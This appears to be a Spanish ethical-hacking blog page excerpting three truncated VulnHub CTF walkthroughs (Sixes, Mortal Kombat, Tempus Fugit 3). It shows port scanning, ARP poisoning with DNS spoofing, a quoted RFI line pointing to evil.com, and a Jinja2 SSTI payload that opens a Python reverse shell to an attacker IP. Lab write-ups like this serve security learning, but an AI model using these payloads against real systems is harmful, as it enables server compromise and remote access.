Hacking Ético

  https://www.vulnhub.com/entry/sixes-1,380/ Advanced-Hard Boot2Root machine intended to be used in a Workshop/CTF beside Shellmates Club. Este es el primer walkthrough de esta máquina en internet. Tiene una serie de movimientos con los que se puede aprender mucho ;) 1.  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 09:50 CET Nmap scan report for sixes.home (192.168.2.28) Host is up (0.016s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT     STATE SERVICE 21/tcp   open  ftp 22/tcp   open  ssh 80/tcp   open  http Accedemos al ftp lftp 192.168.2.28:~> dir -r--r--r--    1 0        0             233 Oct 03  2019 note.txt lftp 192.168.2.28:/> cat note.txt DONE:   - Develop the web application frontend and backend   - Add a firewall to block malicious tools TODO:   - Hire a Pentester to secure the web applicati...

 https://www.vulnhub.com/entry/mortal-kombat-1,383/ You'll need to master and chain together multiple vulnerabilities 1. Se nos presenta lo siguiente Curl test page admin area  (works only if localhost) test page testpage: http://192.168.2.24/index.php?url=http://google.com Probamos lfi http://192.168.2.24/index.php?url=http://127.0.0.1/adminArea.php you can only render page from google.com domain 2. Tenemos que spoofear la petición dns de la máquina virtual haciéndole creer que "google.com" es 127.0.0.1 para poder acceder a adminArea.php.  en kali usar ettercap - configurar etc/ettercap/etter.dns google.com A 127.0.0.1 - Arrancar y hacer mitm arp poisoning seleccionando target1 la víctima y target2 el router - Activar dns spoofing 3. Accedemos a adminArea.php con Burp <!-- After the PT @Bytevsbyt3 told me that my page was really unsecure. He told me that he pwn the server via RFI with ?file=http://evil.com/rfi.txt I read about this vulnerability and now i fixed it. N...

Máquina muy recomendable. This is an hard, real life box, created by @4nqr34z and @theart42 to be used as a CTF challenge on Bsides Newcastle 23. november 2019 and released on Vulnhub the same day. In Tempus Fugit 3, the idea is still, like in the first two challenges; to create something “out of the ordinary”. Aprendizaje avanzado. No pongo las flags. 1. Se trata de un  Server: nginx/1.14.2 Después de fuzzear un poco probamos inyección ssti y funciona http://tf3/{{7*7}} antes de que redirija observamos que muestra un not found tf3/49 Por lo tanto ssti attack reverse   con burp inyectamos  GET /{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.2.84\",9990));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn(\...